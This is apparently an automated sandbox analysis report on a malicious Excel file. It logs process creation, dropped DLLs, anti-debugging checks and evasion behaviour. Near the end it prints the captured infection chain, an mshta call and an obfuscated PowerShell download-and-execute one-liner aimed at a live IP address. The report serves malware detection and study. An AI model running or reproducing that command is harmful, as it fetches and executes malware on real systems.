Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",NNzCvXXtcqztdiA Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",NblZwpRsgtK Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",DllRegisterServer Jump to behavior
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRDB50.tmp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: 3DBB.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation
barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\mshta.exe Code function: 4_3_033A00C0 push 8B4902BAh; iretd 4_3_033A00C6
Source: C:\Windows\System32\mshta.exe Code function: 4_3_033A08C7 push 8B4902BAh; iretd 4_3_033A08CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10032B7D push ecx; ret 9_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030DFF push ecx; ret 9_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034114C push ds; ret 9_2_0034114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003415F5 push cs; retf 9_2_003415FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0042114C push ds; ret 10_2_0042114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_004215F5 push cs; retf 10_2_004215FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10032B7D push ecx; ret 11_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030DFF push ecx; ret 11_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0047114C push ds; ret 11_2_0047114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004715F5 push cs; retf 11_2_004715FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0026114C push ds; ret 12_2_0026114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002615F5 push cs; retf 12_2_002615FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033114C push ds; ret 14_2_0033114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003315F5 push cs; retf 14_2_003315FE
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
PE file contains an invalid checksum
Source: QWER.dll.6.dr Static PE information: real checksum: 0x8f55d should be: 0x909dc

Persistence and Installation Behavior
barindex
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\QWER.dll Jump to dropped file
Drops PE files
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda (copy) Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\QWER.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda (copy) Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Jdywrgg\axwj.zob:Zone.Identifier read attributes | delete Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100134F0 IsIconic, 9_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 9_2_10018C9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100134F0 IsIconic, 11_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 11_2_10018C9A
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\mshta.exe TID: 308 Thread sleep time: -300000s >= -30000s Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: rundll32.exe, 0000000F.00000002.613710689.000000000078A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect, 9_2_10030334
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior

Anti Debugging
barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035D374 mov eax, dword ptr fs:[00000030h] 9_2_0035D374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0043D374 mov eax, dword ptr fs:[00000030h] 10_2_0043D374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0048D374 mov eax, dword ptr fs:[00000030h] 11_2_0048D374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0027D374 mov eax, dword ptr fs:[00000030h] 12_2_0027D374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0034D374 mov eax, dword ptr fs:[00000030h] 14_2_0034D374
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 9_2_10002280
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 9_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 9_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_1003ACCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 11_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 11_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_1003ACCC

HIPS / PFW / Operating System Protection Evasion
barindex
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/qqw/aas/se.html Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD Jump to behavior
